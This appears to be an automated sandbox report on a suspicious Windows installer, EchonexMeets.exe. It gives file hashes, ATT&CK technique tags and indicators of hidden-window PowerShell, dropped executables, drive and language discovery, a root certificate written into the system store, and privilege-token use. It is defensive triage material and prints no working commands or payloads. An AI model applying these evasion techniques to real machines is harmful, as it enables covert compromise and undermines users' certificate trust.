b1fa0c62e07f9ad0a625fd1474a197c1d687b985714c3d697981f5fbe4993266

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
22-02-2025 13:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

EchonexMeets.exe
Size

5.2MB
MD5

521706693511fdecdb0d9052a50ae5fc
SHA1

94214094c8c7c16fb4afc0947a47a386366f4e81
SHA256

b1fa0c62e07f9ad0a625fd1474a197c1d687b985714c3d697981f5fbe4993266
SHA512

ea9608a78e1363b73174c2a3a0732e98fca9e358949e64bfdd7d4dcd9c0a6ccdc2214033dc59cb2c658cc364c172e791233654b3ecf6a1e0cf351b16749f9b74
SSDEEP

98304:PE+JqHlyDS/KzOYH8t9WB2XPzvSXIXf/a+dab7jgOnXTzKqCUvsARxefha5:PE+JqHlyDSixHM9WB4zEHhnXTetUTeC

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2956	powershell.exe
900	powershell.exe
2452	powershell.exe
1564	powershell.exe

Downloads MZ/PE file 2 IoCs

flow	pid	Process
21	780	MsiExec.exe
8	780	MsiExec.exe

Executes dropped EXE 2 IoCs

pid	Process
1504	error.exe
1188	Process not Found

Loads dropped DLL 28 IoCs

pid	Process
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
2744	EchonexMeets.exe
780	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
956	MsiExec.exe
628	MsiExec.exe
628	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
1188	Process not Found
780	MsiExec.exe

Blocklisted process makes network request 9 IoCs

flow	pid	Process
8	780	MsiExec.exe
11	780	MsiExec.exe
12	780	MsiExec.exe
14	780	MsiExec.exe
16	780	MsiExec.exe
18	780	MsiExec.exe
19	1460	msiexec.exe
20	2796	msiexec.exe
21	780	MsiExec.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\W:	EchonexMeets.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\O:	EchonexMeets.exe
File opened (read-only)	\??\S:	EchonexMeets.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	EchonexMeets.exe
File opened (read-only)	\??\R:	EchonexMeets.exe
File opened (read-only)	\??\T:	EchonexMeets.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	EchonexMeets.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	EchonexMeets.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	EchonexMeets.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\H:	EchonexMeets.exe
File opened (read-only)	\??\P:	EchonexMeets.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	EchonexMeets.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\K:	EchonexMeets.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	EchonexMeets.exe
File opened (read-only)	\??\U:	EchonexMeets.exe
File opened (read-only)	\??\Y:	EchonexMeets.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	EchonexMeets.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\B:	EchonexMeets.exe
File opened (read-only)	\??\M:	EchonexMeets.exe
File opened (read-only)	\??\N:	EchonexMeets.exe
File opened (read-only)	\??\Z:	EchonexMeets.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.ev3	DrvInst.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\Installer\f77196a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1D3D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1EE4.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI20EE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{8590777E-4B74-4E5B-8FC4-DDDF8B57F050}\icon.exe	msiexec.exe
File opened for modification	C:\Windows\INF\setupapi.ev1	DrvInst.exe
File opened for modification	C:\Windows\Installer\MSI1E38.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1F82.tmp	msiexec.exe
File created	C:\Windows\Installer\f77196f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI2208.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI204F.tmp	msiexec.exe
File created	C:\Windows\Installer\f77196d.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI202F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI209E.tmp	msiexec.exe
File created	C:\Windows\Installer\{8590777E-4B74-4E5B-8FC4-DDDF8B57F050}\icon.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI22C5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f77196a.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI1F43.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f77196d.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EchonexMeets.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E777095847B4B5E4F84CDDFDB8750F05\ECHONEXAPPLICATION	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\DeploymentFlags = "3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\SourceList\PackageName = "EchonexMeetsRedist.msi"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\SourceList\Net	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E777095847B4B5E4F84CDDFDB8750F05	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\Version = "117702659"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\ProductIcon = "C:\\Windows\\Installer\\{8590777E-4B74-4E5B-8FC4-DDDF8B57F050}\\icon.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\SourceList	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\Echonex Limited\\Echonex Meets 7.4.3\\install\\B57F050\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E777095847B4B5E4F84CDDFDB8750F05\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\PackageCode = "304C7B81B2E4713459324E46EF2426FA"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\ProductName = "Echonex Meets"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B99F3776C8A3FB4095E5A2531EC8AA6	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B99F3776C8A3FB4095E5A2531EC8AA6\E777095847B4B5E4F84CDDFDB8750F05	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E777095847B4B5E4F84CDDFDB8750F05\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\Echonex Limited\\Echonex Meets 7.4.3\\install\\B57F050\\"	msiexec.exe

Modifies system certificate store 2 TTPs 4 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	EchonexMeets.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	EchonexMeets.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	EchonexMeets.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	EchonexMeets.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
2796	msiexec.exe
2796	msiexec.exe
1564	powershell.exe
2452	powershell.exe
2956	powershell.exe
900	powershell.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe
780	MsiExec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2796	msiexec.exe
Token: SeTakeOwnershipPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	2796	msiexec.exe
Token: SeCreateTokenPrivilege	2744	EchonexMeets.exe
Token: SeAssignPrimaryTokenPrivilege	2744	EchonexMeets.exe
Token: SeLockMemoryPrivilege	2744	EchonexMeets.exe
Token: SeIncreaseQuotaPrivilege	2744	EchonexMeets.exe
Token: SeMachineAccountPrivilege	2744	EchonexMeets.exe
Token: SeTcbPrivilege	2744	EchonexMeets.exe
Token: SeSecurityPrivilege	2744	EchonexMeets.exe
Token: SeTakeOwnershipPrivilege	2744	EchonexMeets.exe
Token: SeLoadDriverPrivilege	2744	EchonexMeets.exe
Token: SeSystemProfilePrivilege	2744	EchonexMeets.exe
Token: SeSystemtimePrivilege	2744	EchonexMeets.exe
Token: SeProfSingleProcessPrivilege	2744	EchonexMeets.exe
Token: SeIncBasePriorityPrivilege	2744	EchonexMeets.exe
Token: SeCreatePagefilePrivilege	2744	EchonexMeets.exe
Token: SeCreatePermanentPrivilege	2744	EchonexMeets.exe
Token: SeBackupPrivilege	2744	EchonexMeets.exe
Token: SeRestorePrivilege	2744	EchonexMeets.exe
